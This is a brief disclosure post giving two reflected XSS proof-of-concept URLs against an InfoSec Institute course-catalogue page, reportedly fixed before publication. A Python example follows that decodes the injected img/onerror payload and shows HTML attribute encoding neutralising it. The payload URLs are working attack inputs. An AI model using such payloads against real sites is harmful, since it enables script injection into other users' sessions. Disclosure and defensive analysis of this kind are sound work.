[The XSS PoCs below were submitted to Errata by Rafay. Rafay disclosed the issues to InfoSec Institute (ISI), which fixed them before this post was published. For more information on ISI, see their charlatan page!]
POC:
http://mail.infosecinstitute.com/request_course_catalog.html?courseid=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E
http://mail.infosecinstitute.com/request_course_catalog.html?date=35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E
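What the two PoC parameters decode to, and how HTML attribute encoding on output neutralises them, as an added example that is not part of the original post or ISI's code. The TEMPLATE sink is an assumption, since the post does not show the page's real markup; the helper names are hypothetical.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# The two PoC URLs from the post, assembled from their common parts.
BASE = "http://mail.infosecinstitute.com/request_course_catalog.html"
PAYLOAD = "35%22%3E%3Cimg%20src=d%20onerror=confirm%28/xssbyrafay/%29;%3E"
POC_URLS = [f"{BASE}?courseid={PAYLOAD}", f"{BASE}?date={PAYLOAD}"]

# Hypothetical sink (assumption): a value reflected into a double-quoted attribute.
TEMPLATE = '<input type="hidden" name="{name}" value="{value}">'

def query_params(url):
    """Percent-decode the query string into (name, value) pairs, splitting on '&' only."""
    pairs = []
    for field in urlsplit(url).query.split("&"):
        name, _, value = field.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs

def render(name, value, encode):
    """Reflect a parameter into TEMPLATE, with or without HTML attribute encoding."""
    if encode:
        name, value = escape(name, quote=True), escape(value, quote=True)
    return TEMPLATE.format(name=name, value=value)

class _Tags(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def elements(markup):
    """Return the (tag, attributes) pairs an HTML parser sees in the markup."""
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.tags

if __name__ == "__main__":
    for url in POC_URLS:
        for name, value in query_params(url):
            print(f"{name} = {value!r}")
            for encode in (False, True):
                tags = [t for t, _ in elements(render(name, value, encode))]
                print(f"  encode={encode}: elements parsed = {tags}")
```

Without encoding, the parser sees a second element carrying an onerror handler; with encoding, the whole value stays inside the value attribute as data.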